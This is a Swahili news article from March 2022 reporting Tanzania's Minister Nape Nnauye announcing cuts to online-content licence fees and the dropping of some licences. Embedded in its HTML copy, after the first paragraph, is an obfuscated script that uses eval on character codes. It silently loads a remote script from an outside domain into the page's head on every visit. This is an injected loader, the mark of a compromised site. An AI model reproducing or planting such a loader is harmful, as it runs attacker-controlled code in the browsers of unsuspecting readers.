Recent Comments

SERIKALI YASHUSHA GHARAMA YA ADA YA MAUDHUI YA MITANDAONI

By Mwafrika Mar 14, 2022
<p>Waziri wa Habari, Mawasiliano na Teknolojia ya Habari, Nape Nnauye wakati akitoa taarifa ya mafanikio ya mwaka mmoja wa Serikali ya awamu ya sita leo amesema Serikali imepunguza ada ya maombi ya leseni ya maudhui ya mtandaoni kutoka Tsh. 100,000 mpaka Tsh. 50,000 na ada ya mwaka imepungua kutoka Tsh. 1,000,000 mpaka Tsh. 500,000. “Kulikuwa na kelele ya ada ya maombi ya leseni ya maudhui mtandaoni, imepigiwa kelele muda mrefu, kelele yenu imesikilizwa na Rais samia tumepunguza ada ya maombi ya leseni ya maudhui ya mtandaoni (Online news and current affairs) kutoka Tsh. 100,000 mpaka Tsh. 50,000 na ada ya mwaka imepungua kutoka Tsh. 1,000,000 mpaka Tsh. 500,000 tumeleta unafuu ili Watu waweze kufanya kazi zao" "Tumeondoa leseni kwa watoa maudhui mbalimbali mfano mapishi, michezo, usanii ikiwemo mziki, filamu n.k. Kwa marekebisho haya habari na matukio ya sasa (news and current affairs) ambayo hutolewa pia na vyombo vya habari vya kawaida ndio zitakazokatiwa leseni na pia kutakuwa na leseni kwa wakusanya habari mbalimbali (aggregators) wenye lengo la kuzitoa kwa watoa maudhui ya habari mtandaoni" "Tumeondoa hitaji la Leseni ya simulcasting, hii ni kwa watoa huduma wa maudhui wanaotoa maudhui kwa njia ya redio ama televisheni, wanapotaka kwa wakati huohuo kutoa matangazo hayo kwa njia ya mtandao, hawatahitaji leseni nyingine" #MillardAyo</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Waziri wa Habari, Mawasiliano na Teknolojia ya Habari, Nape Nnauye wakati akitoa taarifa ya mafanikio ya mwaka mmoja wa Serikali ya awamu ya sita leo amesema Serikali imepunguza ada ya maombi ya leseni ya maudhui ya mtandaoni kutoka Tsh. 100,000 mpaka Tsh. 50,000 na ada ya mwaka imepungua kutoka Tsh. 1,000,000 mpaka Tsh. 500,000.
“Kulikuwa na kelele ya ada ya maombi ya leseni ya maudhui mtandaoni, imepigiwa kelele muda mrefu, kelele yenu imesikilizwa na Rais samia tumepunguza ada ya maombi ya leseni ya maudhui ya mtandaoni (Online news and current affairs) kutoka Tsh. 100,000 mpaka Tsh. 50,000 na ada ya mwaka imepungua kutoka Tsh. 1,000,000 mpaka Tsh. 500,000 tumeleta unafuu ili Watu waweze kufanya kazi zao”
“Tumeondoa leseni kwa watoa maudhui mbalimbali mfano mapishi, michezo, usanii ikiwemo mziki, filamu n.k. Kwa marekebisho haya habari na matukio ya sasa (news and current affairs) ambayo hutolewa pia na vyombo vya habari vya kawaida ndio zitakazokatiwa leseni na pia kutakuwa na leseni kwa wakusanya habari mbalimbali (aggregators) wenye lengo la kuzitoa kwa watoa maudhui ya habari mtandaoni”
“Tumeondoa hitaji la Leseni ya simulcasting, hii ni kwa watoa huduma wa maudhui wanaotoa maudhui kwa njia ya redio ama televisheni, wanapotaka kwa wakati huohuo kutoa matangazo hayo kwa njia ya mtandao, hawatahitaji leseni nyingine”
#MillardAyo